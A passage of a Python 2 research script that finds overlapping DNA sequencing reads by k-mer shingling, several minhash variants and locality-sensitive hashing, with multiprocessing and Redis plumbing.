elif ext == "pickle":
with open(input_file, "r") as f:
candidatePairs = pickle.load(f)
logprint(log, False, "pickle-list:", time.clock()-tim)
elif ext == "txt":
with open(input_file, "r") as f:
imported = 0
for line in f:
elements = line.split()
key = int(elements[0])
pairs = map(int, elements[1].split(','))
candidatePairs[key] = pairs
imported += len(pairs)
# print elements
# print key
# print pairs
# print candidatePairs[key]
# sys.exit()
logprint(log, False, "Imported", imported/2, "candidate pairs from",
input_file, "in", time.clock()-tim, "seconds.")
elif ext == "txt2":
with open(input_file, "r") as f:
for line in f:
elements = map(int, line.split())
if elements[0] in candidatePairs:
candidatePairs[elements[0]].append(elements[1])
else:
candidatePairs[elements[0]] = [elements[1]]
logprint(log, False, "txt2 file:", time.clock()-tim)
elif ext == "csv":
for key, val in csv.reader(open(input_file)):
if key in candidatePairs:
candidatePairs[key].append(val)
else:
candidatePairs[key] = [val]
logprint(log, False, "csv:", time.clock()-tim)
else:
logprint(log, True, "File format is not supported for input file."
"Please specify file format (extension) as either txt,",
"json, pickle or csv.")
sys.exit()
# Print imported candidate pairs
# for id1 in candidatePairs:
# print id1
# print candidatePairs[id1]
# sys.exit()
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return candidatePairs
# ************************************************************************** #
# #
# Pre-computations #
# #
# ************************************************************************** #
def computeHashFunctions(n, shingles, log):
"""
Computes n lists of shuffled elements from 1..#shingles.
These lists represents the hash functions needed for LSH.
"""
# Create n different permutations (hash functions) of the shingles
tim = time.clock()
hashfuncs = []
for i in xrange(n):
h = range(len(shingles))
random.shuffle(h)
hashfuncs.append(h)
# print h,"\n"
logprint(log, False, "Computed hashfunctions in",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return hashfuncs
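# ---------------------------------------------------------------------------- #
# Not part of the original pipeline: a minimal sketch of how one permutation
# produced by computeHashFunctions() acts as a minhash function. The minhash of
# a document under a permutation is the smallest permuted index among the
# shingles the document contains. The helper name is hypothetical.
def minhashWithPermutation(permutation, shingleIndices):
    """
    permutation    -- one shuffled list as built by computeHashFunctions()
    shingleIndices -- indices (into the shingle table) present in a read part
    """
    return min(permutation[i] for i in shingleIndices)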
def computeShinglesTable(fasta_file, shinglesPos, k, log):
"""
Computes a table for fast look-up of k-shingles and their corresponding
position in the reads - when it was first encountered in the fasta file.
"""
if not fasta_file:
return shinglesPos
logprint(log, True, "Computing table of shingles positions...")
tim = time.clock()
with open(fasta_file, "rU") as fasta_file:
#shinglesPos = dict()
read = ""
pos = 0
for line in fasta_file:
# If line starts with ">", which indicates end of a sequence
# Then, append it to list of reads
if line.startswith(">"):
if read != "":
# Splits the string into two parts
leftpart = read[:len(read)/2]
for shingle in getDocShingles(leftpart, k):
if shingle not in shinglesPos:
shinglesPos[shingle] = pos
pos += 1
rightpart = read[len(read)/2:]
for shingle in getDocShingles(rightpart, k):
if shingle not in shinglesPos:
shinglesPos[shingle] = pos
pos += 1
if len(leftpart) < k:
logprint(log, False,
"ERROR: k larger than part length\n",
" Pick k smaller than", len(leftpart)
)
sys.exit()
read = ""
# Concatenate multi-line sequences into one string
else:
read += line.strip().upper()
# Compute shingles from last read
if read != "":
# Splits the string into two parts
leftpart = read[:len(read)/2]
for shingle in getDocShingles(leftpart, k):
if shingle not in shinglesPos:
shinglesPos[shingle] = pos
pos += 1
rightpart = read[len(read)/2:]
for shingle in getDocShingles(rightpart, k):
if shingle not in shinglesPos:
shinglesPos[shingle] = pos
#pos += 1
logprint(log, False, "Finished computation of shingles table in",
(time.clock() - tim) / 60, "minutes")
logprint(log, False, "Number of shingles:", len(shinglesPos))
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return shinglesPos
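# ---------------------------------------------------------------------------- #
# Not part of the original pipeline: a minimal illustration of the table built
# above. getDocShingles() is defined elsewhere in this file; the sketch below
# assumes the usual definition (every substring of length k) and maps each new
# shingle to the index of its first occurrence, as computeShinglesTable() does.
def _demoShingleTable(read, k):
    shinglesPos = dict()
    pos = 0
    for part in (read[:len(read) // 2], read[len(read) // 2:]):
        for i in range(len(part) - k + 1):
            shingle = part[i:i + k]
            if shingle not in shinglesPos:
                shinglesPos[shingle] = pos
                pos += 1
    return shinglesPos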
def computeShinglesSet(fasta_file, shingles, k, log):
"""
Computes the set of all k-shingles (k-mers) in all reads.
"""
if not fasta_file:
return shingles
logprint(log, True, "Computing set of all shingles...")
tim = time.clock()
with open(fasta_file, "rU") as fasta_file:
#shingles = set()
read = ""
for line in fasta_file:
# If line starts with ">", which indicates end of a sequence
# Then, append it to list of reads
if line.startswith(">"):
if read != "":
# Splits the string into two parts
leftpart = read[:len(read)/2]
for shingle in getDocShingles(leftpart, k):
shingles.add(shingle)
rightpart = read[len(read)/2:]
for shingle in getDocShingles(rightpart, k):
shingles.add(shingle)
read = ""
# Concatenate multi-line sequences into one string
else:
read += line.strip().upper()
# Compute shingles from last read
if read != "":
# Splits the string into two parts
leftpart = read[:len(read)/2]
for shingle in getDocShingles(leftpart, k):
shingles.add(shingle)
rightpart = read[len(read)/2:]
for shingle in getDocShingles(rightpart, k):
shingles.add(shingle)
logprint(log, False, "Finished shingling in", (time.clock() - tim) /
60, "minutes")
logprint(log, False, "Number of shingles:", len(shingles))
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return shingles
def getAllReads(fasta_file, log, parts=True):
if fasta_file:
reads = []
ext = fasta_file.rsplit(".", 1)[1]
if ext == "fasta" or ext == "fa":
with open(fasta_file, "r") as f:
reads = parseFasta(fasta_file, f, log, parts)
elif ext == "fastq":
with open(fasta_file, "r") as f:
reads = parseFastq(fasta_file, f, log, parts)
elif ext == "gz" or ext == "tar":
tar = tarfile.open(fasta_file, "r")
for file in tar.getmembers():
ext = file.name.rsplit(".", 1)
if len(ext) > 1:
ext = file.name.rsplit(".", 1)[1]
else:
continue
print ext
if ext == "fasta":
f = tar.extractfile(file)
reads += parseFasta(fasta_file, f, log, parts)
elif ext == "fastq":
f = tar.extractfile(file)
reads += parseFastq(fasta_file, f, log, parts)
else:
print "File format", "*"+ext+"*", "is NOT supported. Use FASTA",
print "or FASTQ, possibly compressed as tar.gz."
sys.exit()
return reads
else:
return []
def parseFastq(filename, fasta_f, log, parts=True):
read = ""
tim = time.clock()
logprint(log, False, "Collecting reads from file", filename)
reads = []
seqs = 0
seq_line = False
for line in fasta_f:
# If line starts with ">", which indicates end of a sequence, append it to list of reads
if line.startswith("@"):
seq_line = True
elif line.startswith("+"):
if read != "":
seqs += 1
if parts:
# Splits the string into two parts
leftpart = read[:len(read)/2]
rightpart = read[len(read)/2:]
reads.append(leftpart)
reads.append(rightpart)
else:
reads.append(read)
read = ""
seq_line = False
elif seq_line:
# Concatenate multi-line sequences into one string
read += line.strip().upper()
logprint(log, False, "Finished reading in", (time.clock() - tim) / 60, "minutes")
logprint(log, False, "Found", seqs, "sequences in fasta file")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return reads
def parseFasta(filename, fasta_f, log, parts=True):
"""
Extract the reads (DNA sequences) from the given fasta file.
Splits the reads into two equally (for now) sized parts.
"""
read = ""
tim = time.clock()
logprint(log, False, "Collecting reads from file", filename)
reads = []
seqs = 0
for line in fasta_f:
# If line starts with ">", which indicates end of a sequence,
# append it to list of reads
if line.startswith(">"):
if read != "":
seqs += 1
if parts:
# Splits the string into two parts
leftpart = read[:len(read)/2]
rightpart = read[len(read)/2:]
reads.append(leftpart)
reads.append(rightpart)
else:
reads.append(read)
read = ""
# Concatenate multi-line sequences into one string
else:
read += line.strip().upper()
if read != "":
seqs += 1
if parts:
leftpart = read[:len(read)/2]
rightpart = read[len(read)/2:]
reads.append(leftpart)
reads.append(rightpart)
else:
reads.append(read)
logprint(log, False, "Finished reading in",
(time.clock() - tim) / 60, "minutes")
logprint(log, False, "Found", seqs, "sequences in fasta file")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return reads
def getPartsFromFile(fasta_file, log):
"""
Makes a generator object of all left- and right-parts of all reads
in the given fasta file.
"""
if fasta_file:
with open(fasta_file, "r") as fasta_file:
read = ""
for line in fasta_file:
# If line starts with ">", which indicates end of a sequence, append it to list of reads
if line.startswith(">"):
if read != "":
# Splits the string into two parts
leftpart = read[:int(len(read)*leftPartRatio)]
yield leftpart
rightpart = read[int(len(read)*rightPartRatio):]
yield rightpart
read = ""
# Concatenate multi-line sequences into one string
else:
read += line.strip().upper()
if read != "":
leftpart = read[:int(len(read)*leftPartRatio)]
yield leftpart
rightpart = read[int(len(read)*rightPartRatio):]
yield rightpart
def getPrime(offset):
"""
Finds the first prime number higher than a given offset.
"""
def isPrime(n):
"""
Checks if the given number (n) is a prime number.
"""
if n == 2 or n == 3: return True
if n < 2 or n % 2 == 0: return False
if n < 9: return True
if n % 3 == 0: return False
r = int(n**0.5)
f = 5
while f <= r:
if n % f == 0: return False
if n % (f+2) == 0: return False
f += 6
return True
start = random.randrange(100)
# print "start", start
offset += start
if offset % 2 == 0:
offset += 1
while True:
if isPrime(offset):
return offset
offset += 2
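# ---------------------------------------------------------------------------- #
# Not part of the original pipeline: a sketch of the "ongoing" hash functions
# of the form ((a*x + b) mod p) mod N mentioned in runLSH() below, where p is a
# prime obtained from getPrime() and N would be the number of rows/buckets.
# Drawing a and b once per hash function is an assumption made here.
def makeUniversalHash(p, N):
    """Return one hash function h(x) = ((a*x + b) % p) % N."""
    a = random.randrange(1, p)
    b = random.randrange(0, p)
    def h(x):
        return ((a * x + b) % p) % N
    return h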
# ************************************************************************** #
# #
# Locality Sensitive Hashing #
# #
# ************************************************************************** #
def doWork(tup, b=None, q=None):
if b > 12:
#time.sleep(9000)
#time.sleep(b)
time.sleep(18000)
if b != None:
normal, diseased, shingles, k, rows, min_alg, bands, p = tup
else:
normal, diseased, shingles, k, rows, min_alg, b, bands, p = tup
print b
seqs = getAllReads(normal, None) + getAllReads(diseased, None)
#r = redis.StrictRedis()
buckets = dict()
#candidatePairs = dict()
num = minhashing(normal, diseased, shingles, buckets, k, rows,
min_alg, b, bands, p, None)
numPairs = lshBandMultiCore(buckets, b, seqs, None, q)
#numPairs = 0
#for key in candidatePairs:
#r.rpush(key, candidatePairs[key])
#pre = "redis-cli SADD "+str(key)+" "
#cmd = pre+" ".join(map(str,candidatePairs[key]))
#os.system(cmd+" > /dev/null")
#numPairs += len(candidatePairs[key])
#val = ','.join(map(str, candidatePairs[key]))
#r.sadd(key,candidatePairs[key])
# lst = [i for i in xrange(1000)]
# for i in xrange(100):
# r.rpush(i, lst)
print "Num buckets", len(buckets)
#exportCandidatePairs(candidatePairs, filename, None, num)
#multiSeqAlign(normal, diseased, b, bands, prefix, suffix, num)
#return buckets
#sys.exit()
return None
def runLSH(normal, diseased, bands, rows, k, seed, minhash_alg, test, log, multiProcessing, pool):
"""
Minhash algorithms:
pre-computed hash functions:
1. First hash
2. Through whole matrix (according to the book)
3. Through all documents shingles
    On-the-fly hash functions of the form ((ax+b) mod p) mod N:
4. First hash
5. Through whole matrix (according to the book)
6. Through all documents shingles
"""
# Check if files are provided
if normal or diseased:
tim = time.clock()
random.seed(seed)
candidatePairs = dict()
# getAllReads(normal, log)
# sys.exit()
if minhash_alg == 7:
p = getPrime(4**k)
shingles = None
# Computes table of all k-shingles and their position
elif minhash_alg == 3 or minhash_alg == 6:
# shingles = computeShinglesTable(fasta_file, k, log)
shingles = dict()
shingles = computeShinglesTable(normal, shingles, k, log)
shingles = computeShinglesTable(diseased, shingles, k, log)
# p = getPrime(len(shingles))
p = 0
# Computes set of all k-shingles
else: # minhash alg 1, 2, 4 or 5
# shingles = computeShinglesSet(fasta_file, k, log)
shingles = set()
shingles = computeShinglesSet(normal, shingles, k, log)
shingles = computeShinglesSet(diseased, shingles, k, log)
shingles = list(shingles)
#p = getPrime(len(shingles))
p = 0
# Use Locality-Sensitive Hashing to compute for each bands the buckets
# with similar documents (reads) obtained by minhashing each read.
if not multiProcessing:
# seqs = getAllReads(normal, None) + getAllReads(diseased, None)
for b in xrange(bands):
buckets = dict()
minhashing(normal, diseased, shingles, buckets, k, rows,
minhash_alg, b, bands, p, log)
logprint(log, False, "Number of buckets", len(buckets))
lshBand(buckets, b, candidatePairs, log)
# Stop if memory limit reached
# limit = memory_usage_resource()
# if int(limit) > 300000:
# break
if multiProcessing:
if pool:
numProcs = 3
start = numProcs if numProcs <= bands else bands
prev_start = 0
stop = bands
while True:
params = []
for b in xrange(prev_start, start):
params.append( (normal, diseased, shingles, k, rows,
minhash_alg, b, bands, p) )
prev_start = start
results = pool.map(doWork, params)
tim = time.clock()
logprint(log, False, "Combining candidate pairs...")
for tempDict in results:
#for _ in xrange(bands):
#tempDict = results.get()
for key in tempDict:
if key in candidatePairs:
for item in tempDict[key]:
candidatePairs[key].add(item)
else:
candidatePairs[key] = set(tempDict[key])
logprint(log, False,
"Finished combining candidate pairs in",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
start += numProcs
if start > bands:
start = bands
if prev_start == bands:
break
else:
q = Queue()
#seqs = getAllReads(normal, log) + getAllReads(diseased, log)
params = (normal, diseased, shingles, k, rows,
minhash_alg, bands, p)
numProcs = 25
start = numProcs if numProcs <= bands else bands
prev_start = 0
stop = bands
count = 0
while True: #start < stop+1:
#processes = []
for b in xrange(prev_start, start):
p = Process(target=doWork, args=(params, b, q, ))
p.start()
#processes.append(p)
prev_start = start
# pipe = r.pipeline()
tim = time.clock()
logprint(log, False, "Combining candidate pairs...")
#d = shelve.open("shelveDBs/cache0")
results = 0
while count < start:
key, mates = q.get()
#time.sleep(0.1)
if key == -1:
count += 1
print "Done bands:", count
else:
if key not in candidatePairs:
candidatePairs[key] = set()
for mate in mates:
candidatePairs[key].add(mate)
# key = str(key)
# if d.has_key(key):
# temp_set = d[key]
# for mate in mates:
# temp_set.add(mate)
# d[key] = temp_set
# else:
# d[key] = set(mates)
start += numProcs
if start > bands:
start = bands
# for key in candidatePairs:
# print key, candidatePairs[key]
# shelvesList = [shelve.open("shelveDBs/cache"+str(b), "r") for b
# in xrange(1,bands)]
# for i in d.keys():
# finalSet = set(d[str(i)])
# #for b in xrange(1, bands):
# #d_temp = shelve.open("shelveDBs/cache"+str(b), "r")
# for d_temp in shelvesList:
# lst_temp = d_temp[i]
# #d_temp.close()
# for item in lst_temp:
# finalSet.add(item)
# d[str(i)] = list(finalSet)
#d.close()
logprint(log, False,
"Finished combining candidate pairs in",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
# q.close()
# for p in processes:
# p.join()
if prev_start == bands:
break
logprint(log, False, "\nNumber of unique candidate pairs",
sum(len(candidatePairs[i]) for i in candidatePairs)/2)
logprint(log, False, "Finished LSH in",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource(),
"\n")
# If benchmarking different k-values
if test == 3:
return (time.clock() - tim) / 60, memory_usage_resource(), \
sum(len(candidatePairs[i]) for i in candidatePairs)/2
return candidatePairs
else:
logprint(log, True, "ERROR: NO FASTA FILES OR IMPORT FILE PROVIDED")
sys.exit()
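# Editor's sketch: the choice of bands and rows sets the LSH similarity
# threshold, approximately (1/bands) ** (1/rows) (chapter 3 of the Massive
# Data Mining book); pairs above this Jaccard similarity are likely to
# become candidates in at least one band.
def _example_lsh_threshold(bands, rows):
    """Approximate Jaccard similarity threshold for the given banding."""
    return (1.0 / bands) ** (1.0 / rows)
# e.g. _example_lsh_threshold(25, 4) is roughly 0.45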
def getDocShingles(dna, k, asSet=True):
"""
Computes all shingles of size k in a document (dna sequence)
"""
if asSet:
shingles = {dna[i:i+k] for i in xrange(len(dna)-k+1)}
else: # as list
shingles = [toBase10(dna[i:i+k]) for i in xrange(len(dna)-k+1)]
return shingles
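# Worked example (editor's sketch): the k=3 shingles of a 5-mer, as a set of
# strings and as base-10 encoded positions.
def _example_doc_shingles():
    assert getDocShingles("ACGTA", 3) == set(["ACG", "CGT", "GTA"])
    assert getDocShingles("ACGTA", 3, False) == [6, 27, 44]  # base-10 encoded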
def toBase10(seq):
"""Compute the number from base 4 to base b."""
#digits = []
n = 0
for s in seq:
if s == "A":
i = 0
elif s == "C":
i = 1
elif s == "G":
i = 2
elif s == "T":
i = 3
n = 4 * n + i
    return n
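# Worked example (editor's sketch): "ACGT" encodes as
# ((0*4 + 1)*4 + 2)*4 + 3 = 27, reading A=0, C=1, G=2, T=3 as base-4 digits.
def _example_to_base10():
    assert toBase10("ACGT") == 27
    assert toBase10("AAAA") == 0
    assert toBase10("TTTT") == 4**4 - 1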
def minhashing(normal, diseased, kmers, buckets, k, rows, minhash_alg, bn, bs, p, log):
tim = time.clock()
logprint(log, True, "Minhashing...")
# random.seed(bn)
idx = 0
if minhash_alg < 4:
hashfuncs = computeHashFunctions(rows, kmers, log)
else:
if minhash_alg == 7:
n = 4**k
else:
n = len(kmers)
p = getPrime(n) # temp
a = [random.randrange(1, n) for i in xrange(rows)]
b = [random.randrange(n) for i in xrange(rows)]
for part in getPartsFromFile(normal, log):
if minhash_alg == 6: # Default minhash alg 6
minhashing_alg6(part, idx, kmers, buckets, k, rows, p, a, b, n)
elif minhash_alg == 7:
minhashing_alg7(part, idx, kmers, buckets, k, rows, p, a, b, n)
elif minhash_alg == 1:
minhashing_alg1(part, idx, kmers, buckets, k, rows, hashfuncs)
elif minhash_alg == 2:
minhashing_alg2(part, idx, kmers, buckets, k, rows, hashfuncs)
elif minhash_alg == 3:
minhashing_alg3(part, idx, kmers, buckets, k, rows, hashfuncs)
elif minhash_alg == 4:
minhashing_alg4(part, idx, kmers, buckets, k, rows, p, a, b)
elif minhash_alg == 5:
minhashing_alg5(part, idx, kmers, buckets, k, rows, p, a, b)
idx += 1
if idx % printMinhashProcess == 0:
logprint(log, True, "Band", bn+1, "of", str(bs)+":",
"Processed", idx, "documents in",
(time.clock() - tim) / 60, "minutes")
global secondSample
if secondSample == 0:
secondSample = idx
for part in getPartsFromFile(diseased, log):
if minhash_alg == 6: # Default minhash alg 6
minhashing_alg6(part, idx, kmers, buckets, k, rows, p, a, b, n)
elif minhash_alg == 7:
minhashing_alg7(part, idx, kmers, buckets, k, rows, p, a, b, n)
elif minhash_alg == 1:
minhashing_alg1(part, idx, kmers, buckets, k, rows, hashfuncs)
elif minhash_alg == 2:
minhashing_alg2(part, idx, kmers, buckets, k, rows, hashfuncs)
elif minhash_alg == 3:
minhashing_alg3(part, idx, kmers, buckets, k, rows, hashfuncs)
elif minhash_alg == 4:
minhashing_alg4(part, idx, kmers, buckets, k, rows, p, a, b)
elif minhash_alg == 5:
minhashing_alg5(part, idx, kmers, buckets, k, rows, p, a, b)
idx += 1
if idx % printMinhashProcess == 0:
logprint(log, True, "Band", bn+1, "of", str(bs)+":",
"Processed", idx, "documents in",
(time.clock() - tim) / 60, "minutes")
logprint(log, False, "Finished minhashing in",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return idx
def lshBand(buckets, b, candidatePairs, log):
tim = time.clock()
logprint(log, True, "Running LSH and finding similar pairs...")
numPairsUnique = 0
b += 1
naiveSim = 0.97
total = 0
o = 33 # overlap
skippedBuckets = 0
maxBucket = 0
numBucketsPrintet = 0
# logprint(log, False, "Bucket sizes:")
for bucket in buckets:
# if len(buckets[bucket]) > 1:
# logprint(log, False, str(bucket)+":", len(buckets[bucket]))
# if len(buckets[bucket]) > maxBucket:
# maxBucket = len(buckets[bucket])
# numBucketsPrintet += 1
if len(buckets[bucket]) > 500:
skippedBuckets += 1
continue
for i in xrange(len(buckets[bucket])):
id1 = buckets[bucket][i]
for j in xrange(i+1, len(buckets[bucket])):
id2 = buckets[bucket][j]
if id1 % 2 == 0 and id2 % 2 == 1:
if id1 + 1 != id2:
# naive = globalAlignment(seqs[id1], seqs[id2], o)
# if naive >= naiveSim:
# if id1 in candidatePairs:
# candidatePairs[id1].add(id2)
# else:
# candidatePairs[id1] = set([id2])
# if id2 in candidatePairs:
# candidatePairs[id2].add(id1)
# else:
# candidatePairs[id2] = set([id1])
# numPairsUnique += 1
# total += 1
if id1 in candidatePairs:
candidatePairs[id1].add(id2)
else:
candidatePairs[id1] = set([id2])
if id2 in candidatePairs:
candidatePairs[id2].add(id1)
else:
candidatePairs[id2] = set([id1])
numPairsUnique += 1
# if id1 in candidatePairs:
# candidatePairs[id1].append(id2)
# else:
# candidatePairs[id1] = [id2]
# if id2 in candidatePairs:
# candidatePairs[id2].append(id1)
# else:
# candidatePairs[id2] = [id1]
elif id1 % 2 == 1 and id2 % 2 == 0:
if id1 - 1 != id2:
# naive = globalAlignment(seqs[id1], seqs[id2], o)
# if naive >= naiveSim:
# if id1 in candidatePairs:
# candidatePairs[id1].add(id2)
# else:
# candidatePairs[id1] = set([id2])
# if id2 in candidatePairs:
# candidatePairs[id2].add(id1)
# else:
# candidatePairs[id2] = set([id1])
# numPairsUnique += 1
# total += 1
if id1 in candidatePairs:
candidatePairs[id1].add(id2)
else:
candidatePairs[id1] = set([id2])
if id2 in candidatePairs:
candidatePairs[id2].add(id1)
else:
candidatePairs[id2] = set([id1])
numPairsUnique += 1
# if id1 in candidatePairs:
# candidatePairs[id1].append(id2)
# else:
# candidatePairs[id1] = [id2]
# if id2 in candidatePairs:
# candidatePairs[id2].append(id1)
# else:
# candidatePairs[id2] = [id1]
logprint(log, True, "Number of buckets in band", str(b)+":", len(buckets))
logprint(log, False, "Skipped buckets:", skippedBuckets)
numPairs = 0
for bucket in buckets:
# print buckets[bucket]
numPairs += len(buckets[bucket]) * (len(buckets[bucket])-1) / 2
logprint(log, False, "Number of candidate pairs in band", str(b)+":",
numPairs)
logprint(log, True, "Number of unique candidate pairs in band",
str(b)+":", numPairsUnique)
logprint(log, False, "Total number of candidate pairs:", total)
# logprint(log, True, "Ratio:", float(numPairsUnique) / total)
# temp
#logprint(log, False, "Number of buckets:", len(buckets))
#logprint(log, False, "Max bucket size:", maxBucket)
#logprint(log, False, "Num buckets sizes printet:", numBucketsPrintet)
# print "Finished LSH for band", b, "in", (time.clock() - tim) / 60, \
# "minutes"
# print len(candidatePairs)
return None
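# Editor's note (sketch): part ids alternate left/right per read, so an even
# id (a left part) and the odd id that follows it (id+1, the same read's
# right part) are never reported as a candidate pair -- the parity checks in
# lshBand encode exactly this.
def _example_same_read(id1, id2):
    """Return True if the two part ids belong to the same original read."""
    return (id1 % 2 == 0 and id2 == id1 + 1) or \
           (id2 % 2 == 0 and id1 == id2 + 1)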
def lshBandMultiCore(buckets, b, seqs, log, r=None):
tim = time.clock()
logprint(log, True, "Running LSH and finding similar pairs...")
numPairsUnique = 0
#d = shelve.open("shelveDBs/cache"+str(b), "c")
b += 1
naiveSim = 0.97
total = 0
o = 33 # overlap
skippedBuckets = 0
# SET VERSION
if setVersion:
pipe = r.pipeline()
for bucket in buckets:
for i in xrange(len(buckets[bucket])):
id1 = buckets[bucket][i]
for j in xrange(i+1, len(buckets[bucket])):
id2 = buckets[bucket][j]
if id1 % 2 == 0 and id2 % 2 == 1:
if id1 + 1 != id2:
pipe.sadd(id1,id2)
pipe.sadd(id2,id1)
numPairsUnique += 1
elif id1 % 2 == 1 and id2 % 2 == 0:
if id1 - 1 != id2:
pipe.sadd(id1,id2)
pipe.sadd(id2,id1)
numPairsUnique += 1
pipe.execute()
# LIST VERSION
elif r:
for bucket in buckets:
if len(buckets[bucket]) > 500:
skippedBuckets += 1
continue
for i in xrange(len(buckets[bucket])):
id1 = buckets[bucket][i]
mates = []
for j in xrange(len(buckets[bucket])):
id2 = buckets[bucket][j]
if id1 % 2 == 0 and id2 % 2 == 1:
if id1 + 1 != id2:
naive = globalAlignment(seqs[id1], seqs[id2], o)
if naive >= naiveSim:
mates.append(id2)
numPairsUnique += 1
total += 1
elif id1 % 2 == 1 and id2 % 2 == 0:
if id1 - 1 != id2:
naive = globalAlignment(seqs[id1], seqs[id2], o)
if naive >= naiveSim:
mates.append(id2)
numPairsUnique += 1
total += 1
r.put((id1, mates))
print "Dropping last"
r.put((-1, -1))
print "last dropped"
else:
candidatePairs = dict()
for bucket in buckets:
if len(buckets[bucket]) > 500:
skippedBuckets += 1
continue
for i in xrange(len(buckets[bucket])):
id1 = buckets[bucket][i]
for j in xrange(i+1, len(buckets[bucket])):
id2 = buckets[bucket][j]
if id1 % 2 == 0 and id2 % 2 == 1:
if id1 + 1 != id2:
naive = globalAlignment(seqs[id1], seqs[id2], o)
if naive >= naiveSim:
if id1 in candidatePairs:
candidatePairs[id1].append(id2)
else:
candidatePairs[id1] = [id2]
if id2 in candidatePairs:
candidatePairs[id2].append(id1)
else:
candidatePairs[id2] = [id1]
numPairsUnique += 1
total += 1
elif id1 % 2 == 1 and id2 % 2 == 0:
if id1 - 1 != id2:
naive = globalAlignment(seqs[id1], seqs[id2], o)
if naive >= naiveSim:
if id1 in candidatePairs:
candidatePairs[id1].append(id2)
else:
candidatePairs[id1] = [id2]
if id2 in candidatePairs:
candidatePairs[id2].append(id1)
else:
candidatePairs[id2] = [id1]
numPairsUnique += 1
total += 1
#return candidatePairs
#pipe = r.pipeline()
# for bucket in buckets:
# leftParts = []
# rightParts = []
# for item in buckets[bucket]:
# if item % 2 == 0:
# leftParts.append(item)
# else:
# rightParts.append(item)
# numPairsUnique += len(leftParts)*len(rightParts)
# for key in leftParts:
# #pipe.rpush(key, rightParts)
# #print key, rightParts
# #d[str(key)] = rightParts
# r.put((key, rightParts))
# for key in rightParts:
# #pipe.rpush(key, leftParts)
# #print key, leftParts
# #d[str(key)] = leftParts
# r.put((key, leftParts))
#pipe.execute()
# for key in d.keys():
# print key, d[key]
logprint(log, False, "Skipped buckets:", skippedBuckets)
logprint(log, False, "Number of buckets in band", str(b)+":",len(buckets))
logprint(log, False, "Number of unique candidate pairs in band",
str(b)+":", numPairsUnique)
logprint(log, False, "Total number of candidate pairs:", total)
logprint(log, True, "Ratio:", float(numPairsUnique) / total)
#d.close()
# print "Finished LSH for band", b, "in", (time.clock() - tim) / 60, \
# "minutes"
# print len(candidatePairs)
if not setVersion and not r:
return candidatePairs
return numPairsUnique
# ************************************************************************** #
# #
# Minhashing algorithms #
# #
# ************************************************************************** #
def minhashing_alg1(dna, idx, shingles, buckets, k, rows, hashfuncs):
"""
Uses pre-computed hash functions and first hash
"""
# Create minhash signatures as described in chapter 3 of the book Massive
# Data Mining
# Find signature for each document
docShingles = getDocShingles(dna, k)
signature = [None for i in xrange(rows)]
# For each row in the 'character matrix'
for sigPos in xrange(rows):
for i, h in enumerate(hashfuncs[sigPos]):
if shingles[h] in docShingles:
signature[sigPos] = i
break
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
def minhashing_alg2(dna, idx, shingles, buckets, k, rows, hashfuncs):
"""
Uses pre-computed hashFuncs and runs through each hash (whole matrix)
    and saves the smallest value that occurs in the document
"""
# Create minhash signatures as described in chapter 3 of the book Massive
# Data Mining
# Find signature for each document
docShingles = getDocShingles(dna, k)
signature = [None for i in xrange(rows)]
# For each row in the 'character matrix'
for r in xrange(len(shingles)):
# If the shingle is in the document, then
if shingles[r] in docShingles:
# Find the 'first' shingle relative to each permutation
for i in xrange(rows):
if signature[i] is None or signature[i] > hashfuncs[i][r]:
signature[i] = hashfuncs[i][r]
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
def minhashing_alg3(dna, idx, shingles, buckets, k, rows, hashfuncs):
"""
Uses pre-computed hashFuncs and table to find original shingle position,
    then finds the shingle with the smallest position under each hash function.
"""
# Create minhash signatures as described in chapter 3 of the book Massive
# Data Mining
# Find signature for each document
signature = []
docShingles = getDocShingles(dna, k)
numShingles = len(shingles)
for h in hashfuncs:
minVal = numShingles+1
for shingle in docShingles:
pos = shingles[shingle]
if h[pos] < minVal:
minVal = h[pos]
signature.append(minVal)
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
def minhashing_alg4(dna, idx, shingles, buckets, k, rows, p, a, b):
"""
Uses hash functions in the form ((a*pos+b) mod p) mod N,
    where a and b are random integers and p is a prime with p > N.
Uses the first hash strategy.
"""
# Create minhash signatures as described in chapter 3 of the book Massive
# Data Mining
# Find signature for each document
docShingles = getDocShingles(dna, k)
signature = []
numShingles = len(shingles)
# For each row in the 'character matrix'
for sigPos in xrange(rows):
for i in xrange(numShingles):
val = ((a[sigPos]*i+b[sigPos]) % p) % numShingles
if shingles[val] in docShingles:
signature.append(i)
break
if len(signature)-1 != sigPos:
# Ugly fix, only happens when hashfunction creates collisions
signature.append(random.randrange(numShingles))
#print signature[-1]
if len(signature) == rows:
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
else:
print "FUCK MY LIFE"
sys.exit()
def minhashing_alg5(dna, idx, shingles, buckets, k, rows, p, a, b):
"""
Uses hash functions in the form ((a*pos+b) mod p) mod N,
    where a and b are random integers and p is a prime with p > N.
    Runs through each hash (whole matrix) and saves the smallest value that
    exists in the dna.
"""
# Create minhash signatures as described in chapter 3 of the book Massive
# Data Mining
# Find signature for each document
docShingles = getDocShingles(dna, k)
signature = [None for i in xrange(rows)]
numShingles = len(shingles)
# For each row in the 'character matrix'
for r in xrange(numShingles):
# If the shingle is in the document, then
if shingles[r] in docShingles:
# Find the 'first' shingle relative to each permutation
for i in xrange(rows):
pos = ((a[i]*r+b[i]) % p) % numShingles
if signature[i] is None or signature[i] > pos:
signature[i] = pos
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
def minhashing_alg6(dna, idx, shingles, buckets, k, rows, p, a, b, n):
"""
